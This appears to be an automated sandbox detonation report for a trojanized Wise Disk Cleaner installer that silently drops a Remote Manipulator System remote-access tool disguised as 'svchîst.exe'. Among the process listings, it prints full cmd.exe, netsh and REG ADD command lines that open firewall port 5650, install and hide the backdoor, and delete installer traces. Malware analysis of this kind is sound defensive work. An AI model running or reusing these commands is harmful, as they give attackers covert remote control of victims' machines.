C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
C:\Windows\SysWOW64\drivers\install.exe
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll
C:\Windows\SysWOW64\drivers\ssleay32.dll
C:\Windows\SysWOW64\drivers\libeay32.dll
C:\Windows\SysWOW64\drivers\svchîst.exe
C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Greek.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\German.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\French.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Finnish.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\English.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Dutch (Nederlands).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Danish.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Czech.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Traditional).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Simplified).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Catalan(Spain).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Bulgarian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Latin).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Cyrillic).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Arabic.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Nynorsk).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Bokmal).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Nepali.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Korean.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Japanese.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Italian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Indonesian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hungarian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hebrew.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Colombia).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovenian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovak.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Serbian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Russian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Romanian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Portugal).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Brasil).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Polish.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Persian.ini
Analysis: behavioral2
Detonation Overview
Submitted: 2022-04-17 07:06
Reported: 2022-04-17 07:08
Platform: win10v2004-20220414-en
Max time kernel: 152s
Max time network: 161s
Command Line
Signatures
RMS
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Reads user/profile data of web browsers
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\software\avira\antivir desktop | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\WOW6432Node\avira\antivir desktop | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\avira\antivirus | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\WOW6432Node\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
Checks installed software on the system
Enumerates connected drives
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-0U0TI.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GIIEQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-UDKEJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-MREEQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8DFJB.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-GMTI7.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-N51AI.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GSJ0B.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-3AQ20.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-14VKG.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-4HH0U.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BNU1O.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GK4R7.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-8EFVN.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-P4SP7.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BP6IL.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-MLER0.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9TT3J.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-IGT7O.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-E2B0R.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDefrag.dll | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-DHCCJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-MD2O1.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-JH35S.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-M4OGA.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-M4CQV.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-K6VJF.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2VUGG.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-49TVG.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FH5O6.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\LiveUpdate.exe | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-322D1.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9LRK6.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-V5A52.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-JEUB2.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-3GB98.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2K8S9.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FTJ4K.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-L99TI.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8U5IC.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-N3GO7.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-AHPA0.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-PMEAD.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FFP72.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-HS1UP.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-ACAMM.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-O517D.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-1J6R4.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-J4T27.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OIF4T.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OQ2IF.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\WiseDiskCleaner.exe = "11000" | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = 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 | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = 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 | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = [hex-encoded data omitted] | C:\Windows\SysWOW64\drivers\install.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
"C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 5650 "Open Port 5650"
C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp" /SL5="$40028,3793825,188928,C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
C:\Windows\SysWOW64\drivers\install.exe
"C:\Windows\System32\drivers\install.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d 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 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d 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 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d [hex-encoded data omitted] /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
"C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe" "WDCSkipUAC" "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d 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 /f
C:\Windows\SysWOW64\reg.exe
